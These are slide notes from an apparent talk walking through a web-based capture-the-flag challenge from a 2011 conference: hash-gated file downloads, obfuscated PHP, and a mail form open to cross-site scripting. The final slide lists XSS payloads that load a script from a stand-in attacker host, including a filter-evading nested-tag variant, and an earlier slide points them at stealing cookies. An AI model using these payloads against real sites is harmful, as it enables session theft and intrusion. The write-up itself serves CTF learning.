3. Introduction to CTF
CTF stands for Capture the Flag
Types:
Pre-conference
Educational
Web based
Exploitation
Web + Exploitation
Teams / Individuals
Offensive / Defensive
4. ClubHack 2011 preCON CTF
Free conference entry
Qualified to play Treasure Hunt @ClubHack
Physical CTF
Web Based
5. Tools
Mozilla Firefox
Add-on: Tamper Data
Web Server with PHP
Brain
Time
Patience
……..
……..
6. Execution
Register for the event
Access CTF site
Gather Information & Analyze
Look for hidden treasures
Get the Flag and Submit
7. Stage - 1
Information Gathering
Download.html
Can be used to download files from server
Two params: filename & some HASH
How imp the hash is in file download ?
What type of Hash it is?
How to generate it?
UserLogin.html
Auth Bypass
Guessable Logins
What else ???
8. Stage - 1
Analysis
Download.html
Need hash to download file
Hash is SHA1
How to generate it?
UserLogin.html
No SQLi
No Auth Bypass
No Guessable Login
Brute Force ???
9. Stage - 2
Deep Inspection
Found „execute.php‟ in source of download.html
Looks like command utility
OS commanding ???
Analysis
No OS command execution
“Wonly one command”
Commands which takes „file‟ as parameter ???
Single Command
sha1sum
10. Stage - 3
Something to work on
Hash generation – execute.php
File Download – download.php
Login – UserLogin.php
Try to download files
Download.php
Execute.php
UserLogin.php
Analysis
Only „UserLogin.php‟ is possible to download
11. Stage - 4
Obfuscated PHP Code
UserLogin.php is obfuscated
“Free Online PHP Obfuscator v1.2: http://www.fopo.com.a
r”
No Online de-obfuscation tool available
I was not able to find out one
Analysis
Go Manual Mode !!
Create scripts
14. Stage – 6: Final
Information Gathering
POST form
Looks like mail client
Hard-coded email addresses & Subject
Message is the only available space for User Input
Analysis
Tamper „TO‟ email address & „Subject‟
Test „Message‟ for SQLi, Code Injection, ….
What else ???
15. Stage – 6: Final
Damn…It‟s a ROCK !!!!
No server-side bug
Code Injection
SQLi
Only XSS
No <script> & <img>
May be flag.txt
May be messages.txt || mail.txt || sec*.txt
?????
?????
16. Stage – 6: Final
A Ray of Hope
Tweet from @ClubHack
Only “XSS”
Never seen XSS in CTF
What to exploit?
Myself??
Event Handlers
document.cookie
Did they mean “Some Cookie” ?
17. Final
After 2-days
Got Flag & Submit link
Free entry to ClubHack -> Secured !!
Payloads Used:
<ScRiPt src=“http://attacker.com/evil.js”></script>
me
<scr<script>ipt src=“http://attacker.com/evil.js”></script>
Vishal Oza
18. Thanks/Questions
webDEViL
CTF Creation and Access for “Live Demo”
ClubHack
Organizing CTF challenge
For Gifts !!!
http://twitter.com/amolnaik4